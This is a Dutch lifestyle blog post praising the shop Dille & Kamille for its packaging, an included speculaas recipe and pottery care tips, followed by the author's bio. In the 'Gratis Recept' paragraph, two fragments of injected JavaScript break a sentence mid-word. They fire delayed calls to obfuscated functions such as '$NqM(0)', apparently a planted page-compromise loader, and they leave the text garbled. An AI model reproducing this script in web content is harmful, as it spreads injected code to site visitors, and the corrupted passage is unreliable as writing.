Waarom ik fan ben van Dille & Kamille!

Wat werd ik deze week weer ontzettend verrast bij mijn online bestelling van Dille & Kamille. Op de een of andere manier is elk pakketje dat ik thuis bezorgd krijg een feestje. Elk zakje wat je opent voelt als een cadeautje en ja, ik weet dat ik er gewoon zelf voor betaald heb, maar het voelt goed!

Vrolijk mix met spullen

Dille & Kamille is voor mij een soort snoepwinkel. Uren lang kan ik rondneuzen op de website of in de winkel. Er zijn echt maar weinig dingen die ik niet leuk vind! Zelf houd ik erg van natuurlijke, tijdloze producten met lichte tinten. Ik vind het belangrijk dat als ik dingen koop ze zo min mogelijk trend gebonden zijn. Uiteraard is dit soms wel eens leuk, maar voor de echt goede basis elementen in huis ga ik voor tijdloos.

Gratis Recept

Ik was alvast wat voorbereidend werk aan het doen voor een blog die ik binnenkort ga publiceren en bestelde enthousiast speculaasplanken. (Houd de website in de gaten voor het recept!) Bij dit voorbereidende werk hoort natuurlijk ook het onderdeel ‘vind een geschikt recept’. Dit is altijd best een klusje, want hoe weet je nu welk recept het allerbeste is? Soms gebruik ik het beste van twee recepten en voeg ik op gevoel wat extra ingrediënten dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe.

Wat wil nu? De marketing machine van Dille&Kamille is me voor! Bij mijn bestelling met speculaasplankjes wordt het recept voor speculaasjes namelijk direct meegeleverd! Fantastisch, bedankt voor het gratis recept!

Onderhoud Tips

Ook de onderhoud tips die je bij je bestelling krijgt vind ik erg prettig. Er zitten vaak handige tips bij die ik nog niet wist. Zo kun je rood aardewerk beter niet in de afwasmachine zetten en kan het niet zo goed tegen water. Weer wat geleerd!

Dille & Kamille - Viving.nl

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Waarom ik fan ben van Dille & Kamille!"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.